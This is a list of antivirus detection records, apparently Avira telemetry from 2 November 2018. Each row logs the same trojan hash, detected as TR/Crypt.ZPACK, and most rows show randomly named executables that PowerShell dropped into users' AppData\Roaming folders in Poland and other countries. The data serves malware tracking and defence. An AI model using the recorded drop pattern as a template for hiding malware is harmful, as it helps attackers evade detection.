  Row(detection=Row(filename='avscan-20181102-153708-668eb21f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2e424b19\\AVSCAN-20181102-153642-63A8B258\\AVSCAN-20181102-153708-668EB21F', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:37:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kvutoxn.exe', filepath='c:\\users\\X\\appdata\\roaming\\kvutoxn.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=454656, timestamp='2018-11-02T16:17:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='upfkjcbwbb.exe', filepath='c:\\users\\X\\appdata\\roaming\\upfkjcbwbb.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T15:00:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vm.exe', filepath='c:\\users\\X\\appdata\\roaming\\vm.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T14:28:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yywmqo.exe', filepath='c:\\users\\X\\appdata\\roaming\\yywmqo.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T14:26:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='chohfoiyflb.exe', filepath='c:\\users\\X\\appdata\\roaming\\chohfoiyflb.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T14:26:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iikfkxnjb.exe', filepath='c:\\users\\X\\appdata\\roaming\\iikfkxnjb.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:45:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pudyg.exe', filepath='c:\\users\\X\\appdata\\roaming\\pudyg.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430080, timestamp='2018-11-02T12:45:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='aasfgqf.exe', filepath='c:\\users\\X\\appdata\\roaming\\aasfgqf.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:45:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='djkdc.exe', filepath='c:\\users\\X\\appdata\\roaming\\djkdc.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T17:31:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-173106-39800afa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dbdd67d5\\AVSCAN-20181102-173035-34383BC4\\AVSCAN-20181102-173106-39800AFA', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:31:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gfteryzciel.exe', filepath='c:\\users\\X\\appdata\\roaming\\gfteryzciel.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:45:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vupvzzf.exe', filepath='c:\\users\\X\\appdata\\roaming\\vupvzzf.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T17:51:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hx.exe', filepath='c:\\users\\X\\appdata\\roaming\\hx.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:45:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gugywlyc.exe', filepath='c:\\users\\X\\appdata\\roaming\\gugywlyc.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T18:43:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zoptzhap.exe', filepath='c:\\users\\X\\appdata\\roaming\\zoptzhap.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:45:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134605-63bb324c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae42c134\\AVSCAN-20181102-134550-6062014D\\AVSCAN-20181102-134605-63BB324C', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:46:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zanyscn.exe', filepath='c:\\users\\X\\appdata\\roaming\\zanyscn.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T17:20:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134552-1848c531', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dd62ddc2\\AVSCAN-20181102-134533-15C3F24F\\AVSCAN-20181102-134552-1848C531', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:45:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ctf.exe', filepath='c:\\users\\X\\appdata\\roaming\\ctf.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T13:01:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kgkcp.exe', filepath='c:\\users\\X\\appdata\\roaming\\kgkcp.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:45:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135230-e4660bee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8bc0c0d5\\AVSCAN-20181102-135218-E23EB5BC\\AVSCAN-20181102-135230-E4660BEE', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:45:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dmxhlxs.exe', filepath='c:\\users\\X\\appdata\\roaming\\dmxhlxs.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T12:45:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pmzsjmk.exe', filepath='c:\\users\\X\\appdata\\roaming\\pmzsjmk.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:45:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xggkqj.exe', filepath='c:\\users\\X\\appdata\\roaming\\xggkqj.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=460288, timestamp='2018-11-02T12:45:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bhkbont.exe', filepath='c:\\users\\X\\appdata\\roaming\\bhkbont.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T19:41:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dv.exe', filepath='c:\\users\\X\\appdata\\roaming\\dv.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T12:45:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uclwfv.exe', filepath='c:\\users\\X\\appdata\\roaming\\uclwfv.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T12:45:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143816-44399294', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c8b84931\\AVSCAN-20181102-143755-4193B0E8\\AVSCAN-20181102-143816-44399294', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:38:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-203953-43311680', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0e680c6b\\AVSCAN-20181102-203934-4077FE32\\AVSCAN-20181102-203953-43311680', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:39:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-204647-67460538', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_092ca6dc\\AVSCAN-20181102-204624-632CF2B2\\AVSCAN-20181102-204647-67460538', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:46:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183201-fe83f6b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_338913db\\AVSCAN-20181102-183133-FB4CE89A\\AVSCAN-20181102-183201-FE83F6B6', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:32:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nizjjkvk.exe', filepath='c:\\users\\X\\appdata\\roaming\\nizjjkvk.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T16:21:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cpryg.exe', filepath='c:\\users\\X\\appdata\\roaming\\cpryg.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T14:49:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pqcloas.exe', filepath='c:\\users\\X\\appdata\\roaming\\pqcloas.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T15:16:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lzatcyej.exe', filepath='c:\\users\\X\\appdata\\roaming\\lzatcyej.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T13:25:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='swsytbob.exe', filepath='c:\\users\\X\\appdata\\roaming\\swsytbob.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T17:14:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154142-ab7826a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8c64774\\AVSCAN-20181102-154127-A8E2A7C0\\AVSCAN-20181102-154142-AB7826A0', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:42:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fvdhrv.exe', filepath='c:\\users\\X\\appdata\\roaming\\fvdhrv.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T13:35:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-210103-7d1354e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e62a03c9\\AVSCAN-20181102-210049-7AF2AB90\\AVSCAN-20181102-210103-7D1354E8', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:01:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='szhhqijrgsw.exe', filepath='c:\\users\\X\\appdata\\roaming\\szhhqijrgsw.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T16:30:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='oitqtgon.exe', filepath='c:\\users\\X\\appdata\\roaming\\oitqtgon.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T19:33:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qnajoju.exe', filepath='c:\\users\\X\\appdata\\roaming\\qnajoju.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T15:35:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211525-33bbe038', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36a88796\\AVSCAN-20181102-211405-28EFA953\\AVSCAN-20181102-211525-33BBE038', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:15:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123304-e54f87cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a046862d\\AVSCAN-20181102-123245-E275F1EB\\AVSCAN-20181102-123304-E54F87CD', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T16:32:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wijpmnu.exe', filepath='c:\\users\\X\\appdata\\roaming\\wijpmnu.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=454656, timestamp='2018-11-02T16:32:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ybo.exe', filepath='c:\\users\\X\\appdata\\roaming\\ybo.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T14:34:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141522-92be11fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_41457ca7\\AVSCAN-20181102-141508-90BCB851\\AVSCAN-20181102-141522-92BE11FD', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T13:15:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163551-758e5efe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8e450412\\AVSCAN-20181102-163540-7356C6B3\\AVSCAN-20181102-163551-758E5EFE', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:35:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zet.exe', filepath='c:\\users\\X\\appdata\\roaming\\zet.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T19:29:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211512-78487b4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_30a90ba6\\AVSCAN-20181102-211453-74D38F4E\\AVSCAN-20181102-211512-78487B4D', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:15:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145546-e4f40dcd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_426d22b5\\AVSCAN-20181102-145529-E2C797B1\\AVSCAN-20181102-145546-E4F40DCD', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:55:49Z'), dt=datetime.date(2018, 11, 2)),
